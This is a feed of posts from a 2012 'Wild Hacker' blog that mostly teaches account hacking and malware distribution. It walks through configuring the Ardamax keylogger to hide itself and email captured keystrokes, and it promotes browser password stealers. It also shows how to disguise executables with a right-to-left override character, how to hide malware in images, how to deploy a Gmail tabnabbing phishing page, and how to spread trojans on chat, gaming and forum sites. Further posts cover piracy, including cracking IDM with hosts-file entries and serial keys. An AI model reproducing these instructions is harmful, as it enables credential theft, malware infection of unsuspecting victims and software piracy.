Wild Hacker

Istealer Tutorial : Password Stealer To Hack Twitter / Facebook Account Password

noreply@blogger.com (Niketan Patil) — Sun, 29 Jan 2012 12:09:18 PST

Istealer is an efficient windows password stealer software used for hacking various email account password such paypal password hacking, facebook password hacking etc. I have already explained about RATs and keyloggers to hack email account passwords, where you have to send your keylogged file to victim. In the same way, Istealer can be used to hack email account password and find passwords of various emails. I have provided link for software download. Using Istealer you can easily hack or steal the password of Twitter account, Facebook Account, Gmail Account, Hotmail Account, Yahoo Accounts and many other account password easily.

Basically, in this trick you create server file which is used to capture the keystrokes of your slave, after creating server file you have to send that file to slave and use a bit of social engineering to get them to click on the server file and run the server file. Once the server file is run, it will start his working like capturing keystrokes etc.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Istealer Password stealer - hack email passwords:

Follow the following steps to setup Istealer to hack email account password,

Hack Password : Hack Paypal, Facebook, Hotmail Password Using URL

noreply@blogger.com (Niketan Patil) — Sun, 29 Jan 2012 11:54:18 PST

Hello guys..today i am going to share one of the best and simple trick to hack or steal the password of Facebook Account, Gmail Account, Hotmail Account, Yahoo Accounts etc which are stored in browser using Remote Windows Stealer via URL, You do not need to install any software in victim computer, Just need to send the URL to a slave, use a bit of social engineering to get them to click on the link and run the applet program.

But this Remote Windows Stealer has some limitation, like it only works for Windows Vista / 7, not XP and works on the following browsers: Firefox, Google Chrome, and Internet Explorer.

Remote Windows Stealer is one of the easiest stealers you will ever use. Along with a little social engineering, you can decrypt hundreds of passwords in no time! Luckily, the average many users does not have much knowledge of computers so a little of social engineering should do the trick. It uses vulnerabilities of Windows that I have discovered myself. Just follow a few simple steps and it will decrypt all of the stored passwords from the internet browsers and sends the notification to your email! It is 100% Full Undetectable by ALL anti-viruses because there is nothing downloaded onto the slave's computer.

Basically, in this trick you register your email, pick a theme and it will give you a URL. Send the URL to a slave, use a bit of social engineering to get them to click on the link and run the applet. Once the applet is run, they will get a fake error message and the decrypted stored passwords and cookie files will be sent to your email. It is 100% FUD. All the decryption is done through the applet so it is not JDB and no files are downloaded to the slave's computer hence wont trigger Anti Viruses.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Hack Twitter Account and Facebook Account Password In One Click

Follow the following steps to hack or steal password of Facebook Account, Twitter Account, Hotmail Account, Paypal Account which are stored in browser using Remote Windows Stealer via URL

File Extension Changing Tutorial! Make .exe Look Like a jpeg, mp3 or Whatever You Like!

noreply@blogger.com (Niketan Patil) — Fri, 27 Jan 2012 06:23:50 PST

Hello Guys..On wildhacker I have written about Keylogger and Crypter in my previous articles. Today in this tutorial I will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! By normally changing the extension to e.g .mp3, will corrupt your file, but with this exploit your file will still be executable!

So for example lets say, you have created a file server.exe using keylogger, but I want it to look like a mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

How To Change File Extension

Follow the steps bellow to change the file extension..

Step 1: lets say we have server.exe, now, rename your server.scr (which is still executable) to "songname uploaded by .SCR" (notice the space).

Step 2: Now it's time to use the exploit! Open up the Character Map,

Step 3: Scroll down and find the "U+202E: Right-To-Left Override" character in Character Map,

Click "Select" and then "Copy".

Step 4: Now choose to rename your file, and paste the copied character right before the ".SCR" (press ctrl+v to paste)

Step 5: Then type "3pm" (without the " ") and press Enter. Now it should look like this:
Spoiler,

Done! Obviously you might want to change the icon to look like an mp3 before doing this..

Most browsers have patched this, but it can be used on IM's like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside.

Now go ahead and mix around with .exe/.scr/.com and the fake-extensions to find some other legit-looking combinations!

So friends, I hope this file extension changing tutorial will be useful for you. If you have any problem in this file extension changing tutorial, please mention it in comments bellow.

Enjoy HaCkInG.........

How to Protect WordPress Website From Hackers

noreply@blogger.com (Niketan Patil) — Fri, 27 Jan 2012 01:45:33 PST

After some Website Hacking articles, i am adding one more article in this category which is based WordPress website security. Now days WordPress is one of the most popular platform for many bloggers and every day, thousands of new people are using WordPress. WordPress also provides powerful Content Management Systems (CMS). Because of this popularity, more hackers are targeting WordPress and looking for vulnerabilities within the software.

Today in this article i am going to share some important tips to secure WordPress website from hackers, So you can keep your focus on blogging instead of website security hacked.

Since there are no such software, like an Anti-Virus, available to secure a website. Most of the people just consider the job is done once they setup the website. It definitely is not. You can protect a website or webserver only by continued efforts.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

How to Protect WordPress Blog/Website From Hackers

Follow the following steps in order to protect WordPress Website / Blog.

1) Use Open Source Scripts :

Unless you know what you are doing or have a well versed development team in your payroll, it is a great idea to use open source scripts. Open source scripts like WordPress, Drupal, Joomla, Magento etc. are feature rich, powerful and are backed by thousands of coders for update & support.

This avoids websites falling prey to hackers & spammers due to poorly written code. Instead of building from scratch, you can use the existing scripts and modify them to your liking. Commercial scripts from reputed companies can also be deployed if they issue updates & patches regularly.

2) Use Strong Passwords :

Passwords like “wildlove0123”, “unwildlover” are definitely not good. Your password does not have to reflect your “inner persona” as they are supposed to keep things safe.

Use a combination of numbers, special characters and alphabets and make sure they are atleast 10 characters long. Apps like KeePass, Lastpass etc. can help you generate strong passwords and to store them as well.

3) Update Constantly :

Upgrade to newer versions of scripts or add new features as soon as they are released. Main intension of Upgradation is to fix bugs in the script and are as important as a full version upgrade.

5) Secure Admin Email Address :

Keep the admin email address used to login to your webserver, CMS, database etc. away from the public eye, dont share such email address on website or in forum / social networking site. Use a totally different address in your contact page. This will help from not being scammed by a phising email disguised to have been sent by your hosting company or domain registrar.

6) Add a Database Table Prefix :

If you are using a CMS, blog or forum script, change the default database table prefix. For example in case of WordPress, the default database table prefix is “wp”. So if a brilliant hacker finds a way to extract data from a database, default table prefixes will leave you a sitting duck.

7) Password protect the Database :

It is not a mandatory requirement in a lot of scripts to enter a database password and leaving them empty will still get the script installed. An empty password is a criminal waste of an additional layer of security. Database password do not slow down the website when querying the database, so there is absolutely no reason not to have one.

8) Delete the Installation Folder :

Once the installation is done there is no use for the installer folder in the day to day operations of a website. It is very much possible for a hacker to run the installer once again, empty the database and take control of the website & its content. Ideally it is strongly advised to delete the folder once the installation is complete, but if you know your way around the web server, you can also opt to rename the folder.

9) Change File & Folder Permissions :

Some scripts require full read & write access while installation. This can achieved by using the 777 code on vital folders like config, admin etc. Revert the file permissions back to their original code, say 755 or 644. A file or folder with full read write code gives easy access to inject malicious code in your website.

10) Use Secured FTP Access :

If your webserver or ISP support SFTP access, jump at the opportunity and upload files to your server in fully encrypted glory. Nobody can sniff what you are uploading or downloading to & from the webserver.

11) Restrict Root Access :

Be it may FTP or Database, never give root access to everyone willy nilly. Restrict access to certain non system folders in the case of FTP uploads by people other than the system administrator.

12) Ensure the presence of .htaccess file :

.htaccess files are often used to specify the security restrictions for the particular directory, and make sure you have not deleted it by accident or if it is there in the first place.

13) Add robots.txt file :

robots.txt gives special instructions to search engine spiders as to which folders are to be indexed and which ones are not. Folders with documents, images etc can be kept under wraps from being indexed and displayed in public web searches.

14) Use security plugins :

Mature platforms always have plugins to extend the core functionality of the script. Look for plugins that add an extra layer of security and install them. For example, WP Security Scan plugin checks if most of the steps I have mentioned above have been implemented properly in a WordPress installation.

15) Read leading Tech Blogs :

Keep yourself updated on the latest vulnerabilities, bugs and attacks on the Internet. There will be a time delay before the patches are issued and this information will help you protect your website or to temporarily take it offline if there is a very serious threat. Wired’s Threat Level and Kreb’s on Security are good places to begin.

16) Stay away from Nulled Scripts & Themes :

Piracy of commercial scripts and paid themes is the easiest among all other forms of piracy. Smaller file sizes, absence of version specific keygen, cumbersome Daemons, DLL patches & cracks make it a cake walk to pirate a script rather than a software or PC Game.

However, unlike pirated desktop software where a hidden malware is removed by the Anti Virus software, there is no way you can escape the backdoor added to the codebase. Even for a seasoned programmer, it is impossible to go through thousands of lines of code to check if the script is free of backboors.

A nulled script or theme with a backdoor ensures that the hacker peddling it in the first place has gotten himself a free server to spam people with mails promising to enhance things that cannot be enhanced. If you are lucky, your website might not used for anti government propaganda or for distributing child pornography. Unless you so love orange jumpsuits or better yet, would love to go on an all expenses paid trip to a certain facility in Cuba, stay away from nulled scripts. Nulled scripts hurt the pirate worse than the developer. Enough said.

When it comes to security online, there are always infinite number of ways to protect a website. Share with us the tips & tricks you use to protect your website by leaving a comment.

Credits go to Justin Stravarius.

Happy hacking.........

25+ free Rapidshare, Megaupload, Filesonic Premium Link Generators 2011

noreply@blogger.com (Niketan Patil) — Thu, 26 Jan 2012 04:29:39 PST

Hello guys..Today, I am sharing a list of 25 sites which offer free rapidshare, megaupload, filesonic premium link generator service. So, you just have to enter the file link and these sites will generate premium link for you. The sites offer different types of premium links. Some sites are Rapidshare premium link generators, while some are meant for meagupload and filesonic. I searched a lot for these sites and finally presenting you this list.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Rapidshare, Megaupload, Filesonic Premium Link Generators:

Check the list below to enjoy all the Premium user benefits for free.

1. RS99:

2. TigerLeech:

3. Fileserve Generatory:

4. Filesonic Generatory:

5. Sat2tv:

6. Gleech:

7. Vashstar:

8. Nowleech:

9. Sonicleech:

10. Sredshadow:

11. Neoragex:

12. Mxfull:

13. Zleech:

14. Roscoe:

15. Ezidu:

16. Ezidu (2nd server):

17. Rapidleech4u:

18. KingddlLeech:

19. Warezone:

20. Deaduser:

21. Freshleech:

22. Petaleech:

23. Rapidleech:

24. Noleech:

25. Op3l:

Bonus: Rapid8 is one of the best premium link generators on web. Check it out.

This was the list of 25 rapidshare, meguaupload, filesonic premium link generator sites. Please report any dead premium link generator.

I have checked most of these premium link generators and found it working perfect. If you find any of the links dead, or not working for you, please let me know via comments.

Enjoy Hacking......

Hack Website : Local File Inclusion Tutorial(LFI) For Website Hacking Part 6

noreply@blogger.com (Niketan Patil) — Wed, 25 Jan 2012 10:57:16 PST

In previous article we have discussed various website hacking tutorials like..How to find a vulnerable Website?, Basic information of website hacking, XSS Tutorial , (CSRF/XSRF) and Remote File Inclusion Tutorial.

In this tutorial I show you how to get a shell on websites using Local File Inclusion (LFI) vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial.

.....................just read on.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

How To Hack Website Using Local File Inclusion(LFI)

How To Hack and Crack IDM

noreply@blogger.com (Niketan Patil) — Mon, 23 Jan 2012 07:13:36 PST

Hello Friends, in my previous article we discussed on Sharecash Downloader today i am going to explain how to hack or crack Internet Download Manager (IDM) manually. IDM is the best Internet download manager available on internet but its not free and its cracked or patched versions contains viruses.

Using this hack you can register the Internet Download Manager (IDM) for free using you own credentials i.e register on your Name and email ID.

I am explaining the manual hacking method because most of my users said that patch and keygen contain viruses.

This hack also works for trail IDM that means download a trail IDM from there site and register the professional i.e. full version of IDM with your credentials for free using my hack.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Step 1: Download the IDM trial or If you already have IDM installed Update it by going to Help---}} then to check for Updates.

Step2: Now Go to START => Then go to RUN and type the following text and click enter:

notepad %windir%\system32\drivers\etc\hosts

Step3: Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below u will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on apply and then click on Ok, now u will be able to edit the hosts file and save changes in it.

For Windows 7 users, due to security reasons you will not be able to save hosts file.so follow this steps :
First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see the hosts file.

Now right click on hosts file and go to its properties then go to Security tab select Users under Group or user names and click on edit button,Permission For Host Window will get open, in that window select Users account and grant permission in bellow section which is "Permission for SYSTEM" by clicking all checkbox under "Allow" Name and press Ok.Dnt click on any Deny check box.

Note : If you have login through admin then skip this step6 .Its just for granting permission for editing file.

Step4: Now a notepad file appears something like this as shown below:

Now copy the below lines of code and add to hosts file as shown above image box :

127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com

After adding these piece of code, save the notepad file. And exit from there.

Step5: Now open IDM and click on Registration. When you click on registration, Now a new dialog(window) appears that is asking for Name, Last Name, Email Address and Serial Key.

Step6: Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:

RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M
UK3DV-E0MNW-MLQYX-GENA1
398ND-QNAGY-CMMZU-ZPI39
GZLJY-X50S3-0S20D-NFRF9
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
UVQW0-X54FE-QW35Q-SNZF5
FJJTJ-J0FLF-QCVBK-A287M

And click on ok to register.

Step7: After you click ok, it will show an message that you have registered IDM successfully.

Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire.

That means it will remain full version for life time and you can update it without any problem in future.

Note : To update idm you have to remove those websites added in the host file, after removing those website,save that Hosts file and update IDM software. After succesfull updation again follow above steps to crack Internet Download manager.

I hope you are now able to convert your Trial version of IDM into Full Version. If you have any problem in this tutorial on
How To Hack and Crack IDM,
please mention it in comments.Enjoy .........

How To Unlock BlackBerry Cell Phones : Tutorial & Procedure

noreply@blogger.com (Niketan Patil) — Sun, 22 Jan 2012 21:45:52 PST

Before some years Blackberry phones were only chosen by the professionalor business peoples but now days these all cell phones are not only useful devices for communication, but also a good resource for entertainment, thats why even school and college going students are now choosing Blackberry for fulfilling the entertainment and communication needs.

BlackBerry phones are the leading personal & business communication device in world market, today. BlackBerry phones have exceptional video, software & servicing capabilities to connect all mobile professionals peoples to the internet, email, GPS, business & many more applications. But yet your BlackBerry phone & Iphone is limited by network restrictions, placed upon it by your current service provider. But now you can easily remove these network restrictions just by unlocking the device from the locked network.

Now we can easily unlock most of the Blackberry handsets ranging from the basic Blackberry handsets to the most sort of range of handsets like Blackberry Torch 9800, Blackberry Curve, Blackberry Curve series, Blackberry Storm, Blackberry Curve 8900, Blackberry Bold 9000 and Blackberry 9700 Bold, or any Blackberry device.

In this article i am explaing the whole procedure to unlock BlackBerry Cell Phones, and its totally safe and reliable too.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Unlock your BlackBerry Smart Phones in 3 Easy Steps

Just follow the 3 easy steps below to unlock your BlackBerry smart phone.

Step 1: Find Your BlackBerry Smart Phone Unlocking Model And Network

So, before we start the process for the unlocking BlackBerry Smart Phones device, you need to first find the model name, model number and the your current network provider (i.e. T-Mobile, Vodafone, etc.) on which your Blackberry device is locked.

There are 3 possible ways to identify your BlackBerry model name, model number:

Look at your phone screen immediately after you turn it on
Look on the outside of the phone and/or under the battery on the sticker or
Look on the original box packaging or manual provided with your BlackBerry phone.

Now after finding the model name and number of your BlackBerry Smart Phones, you will also need to find the operator/current network provider on which your Blackberry device is locked like on T Mobile, Vodafone or any other network service provider.

To determine the network provider that your BlackBerry phone is locked to,

Look at the start-up screen on your BlackBerry smart phone, or
Look for the network logo somewhere on the front or back of your Blackberry phone.
Look on the original box packaging or manual provided with your BlackBerry phone.

Step 2: Provide Information to Unlock Your BlackBerry Smart Phone

Next, after finding the model name, model number and the your current network provider of device, you will also have to find the IMEI number of your BlackBerry smart phone device.
The 15 - 17 digit IMEI number is the serial number unique to your BlackBerry mobile or every other phone.

You can easily determine your BlackBerry Phone IMEI # by:

Typing *#06# (Star, pound, zero, six, pound) into your BlackBerry smart phone.
Another way to access your Blackberry PIN and IMEI , is to simply go to your blackberry “options” icon and select that, next scroll down to “status” and select that.
Look at the label back of your BlackBerry smart phone behind the battery.

Now, after collection all the information of your BlackBerry smart phone, you need to proceed to buy the unlock code by doing a payment using Google Checkout or PayPal. You can pay via direct credit card using Google Checkout or Paypal.

Click here to get Unlock Code for BlackBerry smart phone

Step 3: Enter the BlackBerry Unlock Code into Your BlackBerry Phone

Now, after purchasing the unlock code for your Blackberry smart phone device, you now need to proceed for a step by step tutorial on how to complete the unlocking process. To start unlocking your BlackBerry Phone, you will need to select the Blackberry device which needs to be unlocked from a drop down list, If you do not see your phone model in the list, then not to worry, type BlackBerry in the search bar at the top and you will find a list of all BlackBerry Phones we Unlock".

So, in just 3 simple steps you have successfully learnt on how to unlock the device easily and safely too.

That's it friends. I have tried my best to explain as simple as possible to unlock BlackBerry Cell Phones. If you find any problem while unlocking your BlackBerry Cell Phones, please mention it in comments.

If you want to unlock Iphone then click here

Enjoy Unlocking BlackBerry Cell Phones ...

How To Hide Keylogger, Virus, Rats Files in Image - Steganography

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:08:12 PST

There are many ways we hide our data in computer some people use encryption tools like Truecrypt, some hide there files in folders , some use folder lock etc.

Steganography is the art and science of hiding messages, Images, Data .etc in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data, a form of security through obscurity. By using this trick your data will get hidden into any image of your choice without reducing its quality, In following tutorial i will show you how you can Hide Data Behind Images.

In this article I am sharing software which will helps you to hide RAR files in a working jpg file!

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

How To Hide Keylogger, Virus, Rats Files in Image - Steganography

Follow the following steps to hide data behind the image using software.....

Step 1: Download Hide RAR Software to hide RAR file behind the image.
Password : www.wildhacker.com

Step 2: Run the software file rarhide to see,

Step 3: Now select the images in which you want to hide RAR file,

Step 4: After that select RAR file which you wants to hide in the image,

Step 5: Finally click on "Combine" button and select location where you wants to save the file which contain hidden RAR file in image.

Note: To check whether it work or not, just open the file which you made in final step with winrar or change the extension to .rar.

That's it friends. We are successful to hide Keylogger, virus files in a jpeg image. I have tried my best to be as simple as possible to help you hide virus. If you find any problem in this tutorial on how to hide virus in jpeg image, please mention it in comments.

Enjoy n hide virus, keylogger files in image...

How to Hack Gmail Account Password Using Tabnabbing Jan 2012

noreply@blogger.com (Niketan Patil) — Mon, 16 Jan 2012 05:42:09 PST

Hello Friends, in my previous article we discussed on TABNABBING today i am going to explain you How To Hack Gmail Account Password using Tabnabbing method.

Tabnabbing is a modern type of phishing method used to hack websites passwords. As we all know normal Phishing attack is easily detectable on many site such as Facebook,Gmail, yahoo etc.

Like Facebook has implemented an extra code that validates the previous arriving URL and some basic functions. If it founds that page from which you arrived is a Facebook Phish or fake page, it displays a warning message to user that You have been arrived from fraudulent or fake page. So please change you Facebook account password immediately. So Victim easily came to know that was made fool by someone and he changes his account password again.

For more information about Tabnabbing and how to How to protect yourself from Tabnabbing click here

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Hack Gmail Account Password Using Tabnabbing Jan 2012

1. Free Download Gmail Tabnabbing to hack Gmail Account Password.
Password: www.wildhacker.com

2. Extract the folder "gmail tabnabbing-fake page"

3. Now, to any anonymous webhost (any u like), upload this all the files which are in Auto Tab Nabbing folder. You can use my3gb.com, 110mb.com or freewebhost.com or t35.com for this as they are free.

4. After successfull upload, Check whether the hack is working, click on the index.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake gmail login (login.html) page.

5. To make url (name.webhost.com/index.html) short read this article "How To Hide a Url | Change Url | Mask Url".

6. Now read this Article about Fake Mailer : How To Send Anonymous Email

7. Now, send index.html page to victim inbox of which u want to hack Gmail account password.

8. When, he will login with this Gmail phisher to his Gmail account, a new file "password.html" will be created which will contain gmail hacked password in plain text form and he will be redirected to Facebook.com/careers page to avoid suspecion.

Update: If you want to hack facebook and other email account passwords, please use the best Hacking Software- Winspy Keylogger which is FUD (Fully UnDetectable). This is personally recommeded keylogger from wildhacker.

Thus, now you can
hack Gmail account passwords
using this Gmail hacking new technique Tabnabbing. If you have any problem in using this Gmail Tabnabbing/Phisher to hack Gmail account password, mention it in comments section.

Enjoy Gmail Hacking using Tabnabbing .....

Sharecash Downloader 2012 : Bypass All ShareCash Surveys Easily

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:07:54 PST

I have posted so many articles on Sharecash Premium Downloading, but unfortunately most of the trick and sharecash downloader softwares are blocked by Sharecash site. So today i am writing this one one more Sharecash downloading trick which help you to complete Sharecash surveys easily and download files which is very irritating for peoples. For all the people who have trouble with the surveys on $harecash, here's a way to download that works for me almost every time. This may or may not work on other survey sites.

In this article i am not providing any Sharecash Downloader Software, in this trick we will be using Hotspot Shield, a free VPN to access US Survey because most of the US survey are easy than other countries.

How it works : We will be using Hotspot Shield, a free VPN if you are outside of the US like I am to get a survey off $harecash where you simply download something. We are also using Sandboxie to immediately wipe the $harecash program along with prevent any viruses or malicious things into your computer. After you download the program, the file should unlock and you're done.

............just read on.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Sharecash Downloader : Bypass All ShareCash Surveys Easily

Follow the steps below and you will be able to complete Sharecash survey easily.

Step 1 : We will be using Sandboxie in this method, a program that basically protects your computer from malicious or potentially dangerous things when you runs programs through it.

To download Sandboxie click here.

Step 2 : Since $harecash gives surveys that require verification from a phone if you are not from the USA. We will need a VPN to change our IP to get a US ip. We will be using a free VPN called Hotspot Shield.

Note : If you are from the US, skip this step.

To download Hotspot Shield click here.

IMPORTANT : When installing make sure to click the box that says "Fix Page Not Found Errors" as this error may come up a lot.

After installation, run Hotspot Shield and an icon should appear in your tray. Right click the icon then hit connect and you should be taken here.

Hit connect and wait for it to say "State: Connected". After it has been connected, go to any site and this should appear.

Hit start and you are good.

Step 3 : Look for the program or file called "Run Web Browser Sandboxed". If you cannot find it, simply search for "Sandbox" and one of the appearances should be that.

Once your browser has opened go to your $harecash link. There should be a yellow border around your browser when you put your cursor there, like this.

Out of your downloads, you should choose one which implies that you will need to download something. For example, here are my surveys.

I will be choosing the "Hook up directly to the music labels...." one since it implies I must download something.

Download whatever file or toolbar you have chosen. A window like this should appear from Sandbox.

Simply hit close when you see this window. Now, run the program you just downloaded but run it through your web browser, for example in Firefox run the program through your download list. This way, the program stays sandboxed while you run it. If you did this right you should see a border in the installation as such.

Install your program or toolbar. When the program or toolbar is finished and it prompts you to restart your browser, allow them to do this. Soon this message should appear.

Download your file and again this message should appear again.

This time hit recover. Close Firefox and any program that the survey asked you to install and you are free of those programs immediately! Go into the directory where you saved your file and you are done.

So friends, I hope this Sharecash downloader will help you to bypass Sharecash Survey. I tried out this Sharecash downloading trick with numerous sharecash files and found it working perfect for every link. If you have any questions feel free to post below.

Enjoy free Sharecash downloader to bypass Sharecash survey...

Happy new year......

Hack Website : Remote File Inclusion Tutorial For Website Hacking Part 5

noreply@blogger.com (Niketan Patil) — Tue, 24 Jan 2012 09:53:14 PST

As we all know,On WildHacker we have discussed various website hacking tutorials - How to find a vulnerable Website? , Basic information of website hacking, XSS Tutorial and (CSRF/XSRF). Today i am writing this one more 5th article on website hacking using Remote File Inclusion (RFI). In this article I will be showing you how to perform an RFI or Remote File Inclusion attack. This exploits are very simple and are only found in about 1 in every 10 sites - they are still allot of fun to exploit. In this tutorial i will show you how to take advantage of this coding error and possibly take control of the site.

A Remote File Inclusion vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.

To perform Remote File Inclusion will require :

A Vulnerable site
A site with PHP enabled

....................................................................................just read on.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Email Hacking : Hack Facebook Password using Keylogger

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:07:26 PST

Hello friends. I have explained many times how to hack email password using many methods like Phishing, Keylogging or using Hacking softwares used to hack email password. I have informed you guys how to hack Gmail, Yahoo, MSN, Windows Live, Hotmail and many other email accounts. Today, I am adding one more method to hack email password using keylogger. By using this Ardamax keylogger you can hack differents type of accounts password such as Gmail account Password, Facebook account password, Hotmail account password, Yahoo etc..

Ardamax keylogger tutorial :

Ardamax keylogger is now very old keylogger and usually detected by most antiviruses. Though old, it is still one of most used Keyloggers. We can use Binders and Crypters to make Ardamax keylogger FUD (Fully UnDetectable). So, I will inform you about Ardamax Keylogger install and use in this article. I have provided link for software download.... just read on.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Hack Password using Ardamax Keylogger

Step 1: Free download Ardamax keylogger to hack password.
Password: www.wildhacker.com

Step 2: Now, after installing, you will get Ardamax log icon in task bar. Right click on it and select "Enter registration key" and make it full version by entering serial key from Serial key.txt file.

Step 3: Now, again right click on Ardamax taskbar icon and select "Remote Installation" to see Remote Installation Windows, click Next on it.

Step 4: Click on "Next" to get Appearance screen. Here, click on "Additional components" and untick "Log Viewer" and hit Next.

Step 5: Now,on Invisibility screen, check all options and hit Next.

Step 6: Now, on Security screen, click on "Enable" and put the password (remember this pass- you'll need this later). Check all boxes and hit Next.

Step 7: Now, you come to Options, and select options as you need. eg: It is better to have keylogger run after every restart - so tick "Run On Windows Startup" and so on. Click on Next.

Step 8: On "Control" screen, check the box "Send log every" and put time as 5/10 minutes(whatever you wants). Then, in delivery, check "Email". Leave Include as it is. And uncheck "Send only if log size exceeds". Proceed with "Next".

Step 9: Now, on Email, enter as below:
Send To : Enter email id to receive keylogs
Username and password: Enter your any Username and pass of email id for sending Keylogs on your email id which yov have mentioned above.
Now hit "Next".

Step10: In "Control" window dont change anything and hit "Next".

Step 11: In "Screenshots" window, select options as you need and hit Next.

Step 12: In "Webcam" window, select options as you need and hit Next.

Step 13: In Screenshots screen, you can put your own values and hit "Next" to come to Destination. Choose the Keylogger Engine path where you want to put the keylogger on your computer. Untick "Open the folder containing the keylogger engine" to avoid yourself from being keylogged. Choose the icon you want to use for keylogger.

Step 14: Now, click "Next" and then "Finish".

Now, when you have keylogger engine ready. But, this is detected by antivirus as hacktool and so we have to bypass antivirus detection. For this, keylogger is crypted using FUD Crypter. I will not talk about this over here as I have written article on this FUD Crypter. After crypting, you need to bind this crypted keylogged file with say image or any song for further protection and prevent victim doubt.

Note: Your antivirus may detect the downloaded Ardamax keylogger file as virus. Please deactivate your antivirus while installing this Ardamax keylogger. Don't worry, I never play such cheap pranks of hacking my readers.

Update: If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Software- Winspy Keylogger which is FUD (Fully UnDetectable). This is personally recommeded keylogger from wildhacker.

So guys, I hope this
Ardamax keylogger tutorial
will help you in installing Ardamax keylogger for hacking passwords. Remember, ardamax keylogger is detected as hacktool (virus) by most antivirus. So, dont forget to crypt and bind your keylogger file. If you have any problem in using Ardamax keylogger to hack email passwords, please mention it in comments.

Enjoy Email password hacking......

Password Hacking : How To Spread Your Viruses Successfully Over Internet

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:06:58 PST

As we had discussed about How to hack email account password using keylogger Rats ect in my previous articles on wildhacker. Today i am writing article on "How To Spread Your Viruses Successfully Over Internet".

In this tutorial I will show you how to spread your trojans/viruses etc over internet. I will show you many methods, and later you choose which one you are going to use.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Email Password Hacking Software To Hack Hotmail/Gmail etc..

What Is Spreading?

Spreading is the way of your trojans/programs/viruses circulates around the Internet. The point of spreading is to put something hard to find, which people like it. It's about what all people want, but don't have it yet. Well the goal of spreading is to get more victims to your RATs/Keyloggers whatever.

Getting started

Well, to spread you will need a software/keylogger to create trojans/viruses etc.

Some good softwares to create trojans/viruses:

Ok, now the main part if you want your spread to be successfully is to make your viruses FUD by AVs. To make your viruses FUD use a binder or crypter. Most of public binders and crypters, are detected even if they are FUD will be detected soon, so the best way is to use a private stub, and it will stay longer FUD.

Hint for begginers [If you already know this, skip this part]:
A Crypter is a programs that makes other programs UD or FUD by encrypting them.
A Binder is a program that makes other programs UD or FUD by binding them with another file.
UD means undetected, so only a few antivirus programs detect it. FUD means fully undetected, so no antivirus detect it.

How and where to spread ?

Well guys, this is the part who all were waiting for. I will show you a few methods how to spread you viruses and trojans.

1. Omegle

Omegle is a brand-new service for meeting new friends. When you use Omegle, we pick another user at random and let you have a one-on-one chat with each other. Chats are completely anonymous, although there is nothing to stop you from revealing personal details if you would like. You can use Omegle auto spreader while you sleep or when you are free.

Download Omegle Spreader here...

2. YouTube

YouTube is a video sharing website on which users can upload and share videos. Make a 'short' video, no longer than 30 seconds or a minute. In the description, make a short tutorial on how to use the program or the keygen you binded your virus with, add the features of the program and put a download link of your virus. Take a picture as proof aswell, that will make people trust your virus more. Make sure you use a good file hosting, because for example rapidshare won't let them download it first time, so people will get bored and won't download. I use multiupload, awesome host and allows you to see the downloads aswell.

3. Garena

Garena is a free multifunction game platform that allows gamers to interact, organize matches, and play their favorite games online with tens of millions of players. First download Garena client from HERE. After you download Garena install it, and open it. You'll need Garena account, you can create one in 30 seconds. Ok, people in Garena are really stupid and will download your viruses for sure if you make it looks real! You can bind your virus with War3 MapHack, you can find here HERE, or use other hack tools depens which rooms you are going to spread. Ok, after binding your file go to each room and enter you download link. Example of how I do it; "www.multiupload.com/239h8hfsdf - Free MapHack , EXP Hack , Ladder Win , and more!" and I get 500 downloads per day.

4. Forums

This is a really great method and you'll get a lot of downloads everyday. First of all you'll need Multiposter Ultimate Version (Recommended), or you can use the trial one which is limited with 10 forums only.

Here's a download link of the trial version, http://www.multiupload.com/NX5JKHH52G

